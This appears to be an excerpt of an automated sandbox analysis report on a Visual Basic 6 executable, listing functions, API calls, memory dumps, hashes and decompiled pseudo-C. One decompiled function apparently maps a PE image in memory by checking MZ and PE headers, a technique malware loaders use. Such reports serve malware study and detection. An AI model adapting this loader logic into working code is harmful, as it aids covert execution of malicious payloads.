                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410678,0000003C), ref: 0041832A
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041833C
                                                                                • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418353
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401508,0040F430,00000390), ref: 00418398
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult$Free
                                                                                • String ID: ScrollBars
                                                                                • API String ID: 3976024557-3358924163
                                                                                • Opcode ID: 2ddb2dc95add79ded1bcbfe941e0db9d4e22d543f7465bfcf1a2e18eab6e9ed3
                                                                                • Instruction ID: 88c6a321770787cc137e989cf8404dee28f7b2be1861ff3ee63a030beb800251
                                                                                • Opcode Fuzzy Hash: 2ddb2dc95add79ded1bcbfe941e0db9d4e22d543f7465bfcf1a2e18eab6e9ed3
                                                                                • Instruction Fuzzy Hash: 2A317270900304AFC700DFA9C949ADBBBF9FF58B00F14852EE555E7690DB79A8458B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E040, Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,00000000,00401700,80020004), ref: 0041E083
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000028,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0A4
                                                                                • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0B0
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0C0
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000024,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0E1
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0EC
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresultNew2$AddrefFreeMove
                                                                                • String ID:
                                                                                • API String ID: 761186269-0
                                                                                • Opcode ID: 560a3dcd597402b791b5e8b89e03016b881d1fb502b4d6df532b9516abbed2ba
                                                                                • Instruction ID: 75776c9786be6d04ac7cdc0b39a8c0ab4a0650c693c7e4535d323942b1380a1b
                                                                                • Opcode Fuzzy Hash: 560a3dcd597402b791b5e8b89e03016b881d1fb502b4d6df532b9516abbed2ba
                                                                                • Instruction Fuzzy Hash: 9E213D74940209BBCB109F55CD89EDABBB8FB59701F20402AF546B31A0D7746888CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041D830, Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,0041A58C,0040160E,00000000), ref: 0041D873
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000028), ref: 0041D894
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041D8A0
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041D8B0
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000024), ref: 0041D8D1
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041D8DC
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041D8E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresultNew2$AddrefFreeMove
                                                                                • String ID:
                                                                                • API String ID: 761186269-0
                                                                                • Opcode ID: 75236f28268deefaa640679216c9989adff47f36a41fa1c2da724130fc1a8d6b
                                                                                • Instruction ID: 4193a271b04162bfe98f5c40649446b1413f6bc0dd1a5f5878afc4e2b40bbb19
                                                                                • Opcode Fuzzy Hash: 75236f28268deefaa640679216c9989adff47f36a41fa1c2da724130fc1a8d6b
                                                                                • Instruction Fuzzy Hash: D02141B0900205BBCB10AF55CD89EDEBBB8FF59755F100039F542B31A0D7745888CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424100, Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,00000000,?), ref: 0042413E
                                                                                • #608.MSVBVM60(?), ref: 00424170
                                                                                • __vbaVarCat.MSVBVM60(?,?,00000008), ref: 00424182
                                                                                • __vbaStrVarMove.MSVBVM60(00000000), ref: 00424189
                                                                                • __vbaStrMove.MSVBVM60 ref: 00424196
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004241A2
                                                                                • __vbaErrorOverflow.MSVBVM60 ref: 004241E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Move$#608CopyErrorFreeListOverflow
                                                                                • String ID:
                                                                                • API String ID: 224696310-0
                                                                                • Opcode ID: 12fde72446bb504533e342735379de782f866947bc6f24ff4ca0ce03cc353297
                                                                                • Instruction ID: d9deb678c685300fd312cf3568453abdbd1b0516cb045a27177e64b5717359ac
                                                                                • Opcode Fuzzy Hash: 12fde72446bb504533e342735379de782f866947bc6f24ff4ca0ce03cc353297
                                                                                • Instruction Fuzzy Hash: 9311D575A00259AFDB14CF94EA48AEE77B8FB48701F504026F505A3250E7786E058B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418CE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D1E
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D29
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D34
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D3D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004015D0,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D7E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckCopyFreeHresultMove
                                                                                • String ID: FormatText
                                                                                • API String ID: 2366466627-2196219705
                                                                                • Opcode ID: df22f6435530819ac231e12326990d795a244dc4129ef9c5e86be5c3e9fab0ad
                                                                                • Instruction ID: 93c431ecf1583040acda965a528e3ccf86d7fb3ce1253c2d416d41a78d2c1eb0
                                                                                • Opcode Fuzzy Hash: df22f6435530819ac231e12326990d795a244dc4129ef9c5e86be5c3e9fab0ad
                                                                                • Instruction Fuzzy Hash: 99112174900204AFC714DF69DA89A9ABFF8FF58700F10816AF506E73A4DB78A945CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 006206F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: 71563442f7e0ba9c55fdfe9df62b35ebad838ab4464500114361a3c568cddbcb
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: 55511A71A087215BEB10DF26E841B9BB3EA9FD4794F04052EF544E7242E239D9048F96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426970, Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 30%
                                                                                			E00426970(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t35;
				intOrPtr* _t37;
				intOrPtr* _t47;
				intOrPtr* _t48;
				signed int _t50;
				signed int _t51;
				void* _t52;
				void* _t54;
				intOrPtr _t55;

				_t55 = _t54 - 0xc;
				 *[fs:0x0] = _t55;
				_v16 = _t55 - 0x14;
				_v12 = 0x401cc8;
				_t50 = _a4;
				_v8 = _t50 & 0x00000001;
				_t51 = _t50 & 0xfffffffe;
				_a4 = _t51;
				 *((intOrPtr*)( *_t51 + 4))(_t51, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t52);
				_v28 = 0;
				if( *((short*)(_t51 + 0x34)) != 1) {
					if( *0x42a056 == 0xffff) {
						_t29 =  *((intOrPtr*)( *_t51 + 0x2fc))(_t51);
						_t37 = __imp____vbaObjSet;
						_t47 =  *_t37( &_v28, _t29);
						_t31 =  *((intOrPtr*)( *_t47 + 0x5c))(_t47, 0);
						asm("fclex");
						if(_t31 < 0) {
							__imp____vbaHresultCheckObj(_t31, _t47, 0x412014, 0x5c);
						}
						__imp____vbaFreeObj();
						_t48 =  *_t37( &_v28,  *((intOrPtr*)( *_t51 + 0x2fc))(_t51));
						_t35 =  *((intOrPtr*)( *_t48 + 0x5c))(_t48, 0xffffffff);
						asm("fclex");
						if(_t35 < 0) {
							__imp____vbaHresultCheckObj(_t35, _t48, 0x412014, 0x5c);
						}
						__imp____vbaFreeObj();
					}
					 *((short*)(_t51 + 0x34)) = 1;
					_t27 =  *((intOrPtr*)( *_t51 + 0x714))(_t51);
				} else {
					 *((short*)(_t51 + 0x34)) = 2;
					_t27 =  *((intOrPtr*)( *_t51 + 0x714))(_t51);
				}
				_v8 = 0;
				_push(0x426a7a);
				return _t27;
			}



















                                                                                0x00426973
                                                                                0x00426982
                                                                                0x0042698f
                                                                                0x00426992
                                                                                0x00426999
                                                                                0x004269a1
                                                                                0x004269a4
                                                                                0x004269a8
                                                                                0x004269ad
                                                                                0x004269b5
                                                                                0x004269bc
                                                                                0x004269da
                                                                                0x004269df
                                                                                0x004269e5
                                                                                0x004269f2
                                                                                0x004269f9
                                                                                0x004269fe
                                                                                0x00426a00
                                                                                0x00426a0b
                                                                                0x00426a0b
                                                                                0x00426a14
                                                                                0x00426a2a
                                                                                0x00426a31
                                                                                0x00426a36
                                                                                0x00426a38
                                                                                0x00426a43
                                                                                0x00426a43
                                                                                0x00426a4c
                                                                                0x00426a4c
                                                                                0x00426a55
                                                                                0x00426a5b
                                                                                0x004269be
                                                                                0x004269c1
                                                                                0x004269c7
                                                                                0x004269c7
                                                                                0x00426a61
                                                                                0x00426a68
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 004269F0
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 00426A0B
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00426A14
                                                                                • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 00426A28
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 00426A43
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00426A4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult
                                                                                • String ID:
                                                                                • API String ID: 444973724-0
                                                                                • Opcode ID: 07c4af59592e19c593237c716ab18da44d703ac76c12bee90187a58281a0d908
                                                                                • Instruction ID: c9fcb309fc25fa29369b2048aa47880278ec3734a389c4e3143a9d0f139fde5f
                                                                                • Opcode Fuzzy Hash: 07c4af59592e19c593237c716ab18da44d703ac76c12bee90187a58281a0d908
                                                                                • Instruction Fuzzy Hash: 9C316170600215ABD7109F64DD49EABBBB8FF05704F604169F545E32E1D778A8858FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423CC0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 46%
                                                                                			E00423CC0(void* __ebx, void* __esi, void* __ebp, intOrPtr _a4) {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v176;
				intOrPtr _v192;
				void _v248;
				short _v268;
				intOrPtr _v282;
				intOrPtr _v284;
				void _v288;
				intOrPtr _v296;
				char _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				short _v544;
				short _v556;
				void _v564;
				signed char _v568;
				char _v628;
				intOrPtr _v636;
				signed int _v640;
				signed int _v644;
				intOrPtr _v780;
				void _v888;
				void* _t54;
				void* _t55;
				intOrPtr _t57;
				int _t59;
				void* _t62;
				signed char _t65;
				void* _t66;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				void* _t80;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				intOrPtr _t90;
				void* _t93;
				void* _t98;
				intOrPtr _t120;
				void* _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				short _t126;
				intOrPtr _t133;
				void* _t134;
				intOrPtr _t139;
				void* _t142;
				void* _t143;
				signed int _t148;
				signed int _t149;
				void* _t156;
				intOrPtr _t157;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t170;
				void* _t172;
				void* _t175;
				void* _t178;
				void* _t181;

				_t93 = __ebx;
				memset( &_v288, memset( &_v248, 0, 0x3e << 2), 0xa << 2);
				_t175 = _t172 - 0x120 + 0x18;
				_t139 = _a4;
				_t54 =  &_v248;
				L18();
				__imp____vbaI4Str(L"&H1000", 4, _t139, _t54, _t134, __esi, __ebp, __ebx);
				_push(_t54);
				_push(_v176);
				_push(_v4);
				_t55 = E00423FD0();
				_push(_v192);
				_push(_t139);
				_push(_t55);
				E00424000();
				_t156 = _t54 + 4;
				_t126 = _v268;
				_t57 = _v282;
				if(_t156 < 0) {
					L17:
					__imp____vbaErrorOverflow();
					0;
					0;
					_push(_t93);
					_push(_t156);
					_push(_t139);
					_t59 = memset( &_v564, 0, 0x3e << 2);
					_t142 =  &_v628;
					memset(_t142, _t59, 0x10 << 2);
					_t178 = _t175 - 0x138 + 0x18;
					_t143 = _t142 + 0x10;
					_t62 = E004240A0( &_v628);
					_push(0x40);
					_t157 = _v316;
					_push(_t157);
					_push(_t62);
					E00424000();
					if((_v644 & 0x0000ffff) != 0x5a4d) {
						L25:
						return 0;
					} else {
						_t65 = _v568;
						if((_t65 & 0x00000003) != 0) {
							goto L25;
						} else {
							_t66 = _t65 + _t157;
							if(_t66 < 0) {
								__imp____vbaErrorOverflow();
								0;
								_push(0);
								_push(_t157);
								_push(_t143);
								memset( &_v888, 0, 0x3e << 2);
								_t181 = _t178 - 0xf8 + 0xc;
								_t69 =  &_v888;
								_push(_t69);
								_push(_v636);
								L18();
								_t159 = _t69;
								if(_t159 == 0) {
									L38:
									return 0;
								} else {
									_t148 = _v640;
									if(_t148 < 0 || _t148 >= _v780) {
										goto L38;
									} else {
										_t98 = E004240A0(_v636);
										if(_t148 >= 0x10) {
											__imp____vbaGenerateBoundsError();
										}
										_t73 = E004240A0(_t181 + 0x84 + _t148 * 8);
										_push(8);
										_push(_t73);
										_push(_t98);
										_t74 = E00424000();
										_t161 = _t159 + 4;
										if(_t161 < 0) {
											L39:
											__imp____vbaErrorOverflow();
											return _t74;
										}
										_t162 = _t161 + 0x14;
										if(_t162 < 0) {
											goto L39;
										}
										_t163 = _t162 + 0x60;
										if(_t163 < 0) {
											goto L39;
										}
										_t149 = _t148 * 8;
										if(_t149 < 0) {
											goto L39;
										}
										_t164 = _t163 + _t149;
										if(_t164 < 0) {
											goto L39;
										}
										return _t164;
									}
								}
							} else {
								_t166 = _t66;
								_t76 = E004240A0( &_v564);
								_push(0xf8);
								_push(_t166);
								_push(_t76);
								E00424000();
								if(_v556 != 0x10b || _v564 != 0x4550 || _v544 != 0xe0) {
									goto L25;
								} else {
									_t79 = E004240A0(_v308);
									_t80 = E004240A0( &_v568);
									_push(0xf8);
									_push(_t80);
									_push(_t79);
									E00424000();
									return _t166;
								}
							}
						}
					}
				} else {
					_t156 = _t156 + 0x14;
					if(_t156 < 0) {
						goto L17;
					} else {
						_t156 = _t156 + _t126;
						if(_t156 < 0) {
							goto L17;
						} else {
							_t83 = _t57 - 1;
							if(_t83 < 0) {
								goto L17;
							} else {
								_t170 = _t83;
								_t93 = 0;
								if(_t170 < 0) {
									L16:
									return 0;
								} else {
									while(1) {
										_t85 = E004240A0( &_v300);
										_t86 = E00424000();
										__imp____vbaI4Str(L"&H1000", 4, _t85, _t156, 0x28);
										_push(_t86);
										_t139 = _v24;
										_t88 = _v308 + _t139;
										_push(_v312);
										if(_t88 < 0) {
											goto L17;
										}
										_push(_t88);
										_t139 = E00423FD0();
										_t90 = _v304;
										if(_t90 == 0) {
											L13:
											__imp____vbaUI1I2();
											_push(_t90);
											_push(_v296);
											_push(_t139);
											E00424010();
											_t156 = _t156 + 0x28;
											if(_t156 < 0) {
												goto L17;
											} else {
												_t93 = _t93 + 1;
												if(_t93 < 0) {
													goto L17;
												} else {
													if(_t93 <= _t170) {
														continue;
													} else {
														goto L16;
													}
												}
											}
										} else {
											_t120 = _v296;
											if(_t90 > _t120) {
												_t90 = _t120;
												_v288 = _t90;
											}
											_t122 = _v284 + _v12;
											_push(_t90);
											if(_t122 < 0) {
												goto L17;
											} else {
												_push(_t122);
												_push(_t139);
												E00424000();
												_t90 = _v300;
												_t123 = _v308;
												_t133 = _t90 + _t139;
												if(_t133 < 0) {
													goto L17;
												} else {
													_t124 = _t123 - _t90;
													_t139 = _t133;
													if(_t124 < 0) {
														goto L17;
													} else {
														_v296 = _t124;
														goto L13;
													}
												}
											}
										}
										goto L41;
									}
									goto L17;
								}
							}
						}
					}
				}
				goto L41;
			}










































































                                                                                0x00423cc0
                                                                                0x00423ce0
                                                                                0x00423ce0
                                                                                0x00423ce2
                                                                                0x00423ce9
                                                                                0x00423cef
                                                                                0x00423cfd
                                                                                0x00423d03
                                                                                0x00423d12
                                                                                0x00423d13
                                                                                0x00423d14
                                                                                0x00423d20
                                                                                0x00423d21
                                                                                0x00423d22
                                                                                0x00423d23
                                                                                0x00423d28
                                                                                0x00423d2b
                                                                                0x00423d30
                                                                                0x00423d35
                                                                                0x00423e1e
                                                                                0x00423e1e
                                                                                0x00423e2a
                                                                                0x00423e2e
                                                                                0x00423e3d
                                                                                0x00423e3e
                                                                                0x00423e3f
                                                                                0x00423e44
                                                                                0x00423e4b
                                                                                0x00423e4f
                                                                                0x00423e4f
                                                                                0x00423e4f
                                                                                0x00423e58
                                                                                0x00423e5d
                                                                                0x00423e5f
                                                                                0x00423e66
                                                                                0x00423e67
                                                                                0x00423e68
                                                                                0x00423e7d
                                                                                0x00423ef2
                                                                                0x00423efd
                                                                                0x00423e7f
                                                                                0x00423e7f
                                                                                0x00423e85
                                                                                0x00000000
                                                                                0x00423e87
                                                                                0x00423e87
                                                                                0x00423e8d
                                                                                0x00423f00
                                                                                0x00423f0c
                                                                                0x00423f1d
                                                                                0x00423f1e
                                                                                0x00423f1f
                                                                                0x00423f24
                                                                                0x00423f24
                                                                                0x00423f2d
                                                                                0x00423f31
                                                                                0x00423f32
                                                                                0x00423f35
                                                                                0x00423f3a
                                                                                0x00423f3e
                                                                                0x00423faa
                                                                                0x00423fb5
                                                                                0x00423f40
                                                                                0x00423f40
                                                                                0x00423f49
                                                                                0x00000000
                                                                                0x00423f54
                                                                                0x00423f64
                                                                                0x00423f66
                                                                                0x00423f68
                                                                                0x00423f68
                                                                                0x00423f76
                                                                                0x00423f7b
                                                                                0x00423f7d
                                                                                0x00423f7e
                                                                                0x00423f7f
                                                                                0x00423f84
                                                                                0x00423f87
                                                                                0x00423fb8
                                                                                0x00423fb8
                                                                                0x00000000
                                                                                0x00423fb8
                                                                                0x00423f89
                                                                                0x00423f8c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423f8e
                                                                                0x00423f91
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423f93
                                                                                0x00423f96
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423f98
                                                                                0x00423f9b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423fa7
                                                                                0x00423fa7
                                                                                0x00423f49
                                                                                0x00423e8f
                                                                                0x00423e90
                                                                                0x00423e92
                                                                                0x00423e97
                                                                                0x00423e9c
                                                                                0x00423e9d
                                                                                0x00423e9e
                                                                                0x00423eaa
                                                                                0x00000000
                                                                                0x00423ebf
                                                                                0x00423ec7
                                                                                0x00423ed3
                                                                                0x00423ed8
                                                                                0x00423edd
                                                                                0x00423ede
                                                                                0x00423edf
                                                                                0x00423eef
                                                                                0x00423eef
                                                                                0x00423eaa
                                                                                0x00423e8d
                                                                                0x00423e85
                                                                                0x00423d3b
                                                                                0x00423d3b
                                                                                0x00423d3e
                                                                                0x00000000
                                                                                0x00423d44
                                                                                0x00423d44
                                                                                0x00423d46
                                                                                0x00000000
                                                                                0x00423d4c
                                                                                0x00423d4c
                                                                                0x00423d50
                                                                                0x00000000
                                                                                0x00423d56
                                                                                0x00423d56
                                                                                0x00423d59
                                                                                0x00423d5d
                                                                                0x00423e0f
                                                                                0x00423e1b
                                                                                0x00423d63
                                                                                0x00423d63
                                                                                0x00423d68
                                                                                0x00423d71
                                                                                0x00423d7d
                                                                                0x00423d83
                                                                                0x00423d88
                                                                                0x00423d93
                                                                                0x00423d95
                                                                                0x00423d96
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423d9c
                                                                                0x00423da2
                                                                                0x00423da4
                                                                                0x00423daa
                                                                                0x00423de9
                                                                                0x00423deb
                                                                                0x00423df5
                                                                                0x00423df6
                                                                                0x00423df7
                                                                                0x00423df8
                                                                                0x00423dfd
                                                                                0x00423e00
                                                                                0x00000000
                                                                                0x00423e02
                                                                                0x00423e02
                                                                                0x00423e05
                                                                                0x00000000
                                                                                0x00423e07
                                                                                0x00423e09
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423e09
                                                                                0x00423e05
                                                                                0x00423dac
                                                                                0x00423dac
                                                                                0x00423db2
                                                                                0x00423db4
                                                                                0x00423db6
                                                                                0x00423db6
                                                                                0x00423dc5
                                                                                0x00423dc7
                                                                                0x00423dc8
                                                                                0x00000000
                                                                                0x00423dca
                                                                                0x00423dca
                                                                                0x00423dcb
                                                                                0x00423dcc
                                                                                0x00423dd1
                                                                                0x00423dd5
                                                                                0x00423ddb
                                                                                0x00423ddd
                                                                                0x00000000
                                                                                0x00423ddf
                                                                                0x00423ddf
                                                                                0x00423de1
                                                                                0x00423de3
                                                                                0x00000000
                                                                                0x00423de5
                                                                                0x00423de5
                                                                                0x00000000
                                                                                0x00423de5
                                                                                0x00423de3
                                                                                0x00423ddd
                                                                                0x00423dc8
                                                                                0x00000000
                                                                                0x00423daa
                                                                                0x00000000
                                                                                0x00423d63
                                                                                0x00423d5d
                                                                                0x00423d50
                                                                                0x00423d46
                                                                                0x00423d3e
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaI4Str.MSVBVM60(&H1000,00000004,?,?,72A46AEE,00000000,?,?), ref: 00423CFD
                                                                                • __vbaI4Str.MSVBVM60(&H1000,00000004,00000000,-00000018,00000028,?,00000000,?,?,?,?,00000000,?,?), ref: 00423D7D
                                                                                • __vbaUI1I2.MSVBVM60(?,?,00000000,?,?), ref: 00423DEB
                                                                                • __vbaErrorOverflow.MSVBVM60(00000000,?,?,?,?,00000000,?,?), ref: 00423E1E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$ErrorOverflow
                                                                                • String ID: &H1000
                                                                                • API String ID: 275696625-2648123403
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 64bb9756d3c69426e1d85879386c8959f5bfb4570975878a94bb64cfe91e0cb3
